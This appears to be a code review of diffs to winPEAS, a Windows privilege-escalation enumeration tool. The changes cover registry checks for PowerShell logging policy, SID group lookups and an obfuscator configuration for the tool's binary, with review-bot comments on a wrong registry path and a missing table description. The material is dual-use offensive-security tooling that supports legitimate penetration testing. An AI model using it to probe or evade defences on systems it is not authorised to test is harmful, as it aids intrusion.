Dictionary<string, object> moduleLoggingSettings = MyUtils.GetRegValues("HKLM", "SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging");
if ((moduleLoggingSettings == null) || (moduleLoggingSettings.Count == 0))
moduleLoggingSettings = MyUtils.GetRegValues("HKLM", @"SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging");
if ((moduleLoggingSettings != null) && (moduleLoggingSettings.Count != 0))
{
foreach (KeyValuePair<string, object> kvp in moduleLoggingSettings)
@ -245,6 +251,9 @@ namespace winPEAS
}
Dictionary<string, object> scriptBlockSettings = MyUtils.GetRegValues("HKLM", "SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging");
if ((scriptBlockSettings == null) || (scriptBlockSettings.Count == 0))
scriptBlockSettings = MyUtils.GetRegValues("HKLM", @"SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging");
if ((scriptBlockSettings != null) && (scriptBlockSettings.Count != 0))
{
foreach (KeyValuePair<string, object> kvp in scriptBlockSettings)
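Review bot: The Wow6432Node fallback for Transcription in the first hunk, `transcriptionSettings = MyUtils.GetRegValues("HKLM", @"HKLM\SOFTWARE\Wow6432Node\...")`, repeats the hive inside the key path, while the ModuleLogging and ScriptBlockLogging fallbacks in the next two hunks pass a hive-relative path; if `GetRegValues` opens the path under the hive given in its first argument, this lookup targets a key that does not exist and the fallback silently yields nothing. The path should be `@"SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription"` to match the other two. The enclosing method starts and ends outside the hunk.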


@ -218,7 +218,14 @@ namespace winPEAS
{
if (Buffer != IntPtr.Zero)
{
Marshal.FreeHGlobal(Buffer);
try
{
Marshal.FreeHGlobal(Buffer);
}
catch(Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex));
}
Buffer = IntPtr.Zero;
}
}
@ -396,6 +403,7 @@ namespace winPEAS
{ "S-1-5-21.+-518", "Schema Admins" }, //A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain.
{ "S-1-5-21.+-519", "Enterprise Admins" }, //A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain.
{ "S-1-5-21.+-520", "Group Policy Creator Owners" }, //A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator.
{ "S-1-5-21.+-525", "Protected Users" }, //https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#protected-users
{ "S-1-5-21.+-526", "Key Admins" }, //A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
{ "S-1-5-21.+-527", "Enterprise Key Admins" }, //A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
{ "S-1-5-21.+-553", "RAS and IAS Servers" }, //A domain local group. By default, this group has no members. Servers in this group have Read Account Restrictions and Read Logon Information access to User objects in the Active Directory domain local group.
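Review bot: The new `catch(Exception ex)` around `Marshal.FreeHGlobal(Buffer)` catches everything and only reports it in gray, which hides the condition it was added for (presumably a pointer that was not obtained from `AllocHGlobal`, since `FreeHGlobal` only throws when the underlying free fails); a short comment recording that, e.g. `// FreeHGlobal throws if the underlying LocalFree fails (e.g. Buffer was not allocated with AllocHGlobal); report rather than abort the enumeration`, would help the next reader, and the catch should not be widened further. In the SID table of the following hunk, the `Protected Users` entry carries only a link where every neighbouring row has a one-line description; a comment such as `//A global group whose members cannot authenticate with NTLM/Digest/CredSSP, cannot use DES or RC4 for Kerberos, cannot be delegated and get no cached logon data; membership indicates credential-theft mitigations are in effect` keeps the table consistent. Both enclosing blocks start and end outside their hunks.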



@ -8,19 +8,19 @@
<input>
<loadpaths />
<asmlist>
<inputassembly refid="e530c479-7674-4845-a184-2dc88a7a642f">
<inputassembly refid="ab1132df-ee7b-445f-92fd-fb405cce20f6">
<option>honoroas</option>
<option>stripoa</option>
<option>library</option>
<option>transformxaml</option>
<file dir="D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="Microsoft.Win32.TaskScheduler.dll" />
<file dir="D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="Microsoft.Win32.TaskScheduler.dll" />
</inputassembly>
<inputassembly refid="bf3fde19-95ca-4d0e-b46f-6136ba4e2100">
<inputassembly refid="f33839ff-b6f0-4afa-921f-50f70c620cb7">
<option>honoroas</option>
<option>stripoa</option>
<option>library</option>
<option>transformxaml</option>
<file dir="D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="winPEAS.exe" />
<file dir="D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release" name="winPEAS.exe" />
</inputassembly>
</asmlist>
</input>


@ -2,8 +2,14 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.csprojAssemblyReference.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Debug\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Debug\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll


@ -1 +0,0 @@
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\packages\TaskScheduler.2.8.16\lib\net40\Microsoft.Win32.TaskScheduler.xml


@ -43,7 +43,6 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.csprojAssemblyReference.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\Release\winPEAS.pdb
@ -63,3 +62,11 @@ D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\win
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll


@ -18,7 +18,6 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.pdb
@ -39,3 +38,11 @@ D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\win
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll


@ -18,7 +18,6 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.pdb
@ -39,3 +38,11 @@ D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\win
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll